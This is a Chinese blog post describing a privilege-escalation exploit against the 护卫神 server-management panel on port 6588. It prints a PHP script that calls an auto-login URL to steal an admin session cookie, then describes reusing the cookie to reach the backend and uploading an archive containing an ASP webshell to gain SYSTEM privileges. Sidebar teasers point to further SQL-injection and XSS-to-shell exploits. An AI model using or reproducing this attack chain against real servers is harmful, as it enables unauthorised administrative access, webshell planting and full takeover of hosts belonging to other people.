护卫神6588端口提权漏洞

少羽.
393
文章
72
评论
2019年5月27日10:08:41 评论 8,099 586字阅读1分57秒

利用条件:

shell权限

可执行脚本

<?php
function httpGet() {
    $url = 'https://www.0dayhack.com:6588/admin/index.asp?f=autologin';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, TRUE);    //表示需要response header
    curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 120);
    $result = curl_exec($ch);
    return $result;
}
echo httpGet();
echo asd;
?>

上传脚本访问获取cookie,修改cookie访问:6588/admin/index.asp成功进入后台

利用支持解压包 解压包的内容是asp马 以护卫神的system权限达到提权

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin
广告也精彩
记一次渗透之从后台到提权 技术园

记一次渗透之从后台到提权

某日朋友发来一个站让搞!搞搞搞! 国外站,翻译的我尴尬证都犯了。某日朋友发来一个站让搞!搞搞搞! 习惯性先发文章看看编辑器上传附件什么的。 四处上传,首先尝试编辑器处上传图片,经验告诉我越low的编辑...
emlog程序xss漏洞后台拿shell以及修复方法 技术园

emlog程序xss漏洞后台拿shell以及修复方法

目前 很多Emlog的模板都已经修复了这个XSS漏洞 一小部分还没修复 所以 今天就利用这个漏洞原理 来拿下一个博客站的后台! 教程开始 首先 检查一下有没有开放注册 如果开放注册的话 就先注册一个账...
亿网cms通杀万能密码漏洞及SQL注入漏洞 技术园

亿网cms通杀万能密码漏洞及SQL注入漏洞

目前亿网中国网站管理系统最新版本为 5.0版本,5.0及以下后台登陆用户名处均存在sql注入 官网网站:www.net111.cn 漏洞由菜鸟小Q提供,小残博客整理发布。 万能密码漏洞我想大家都已经很...
匿名

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: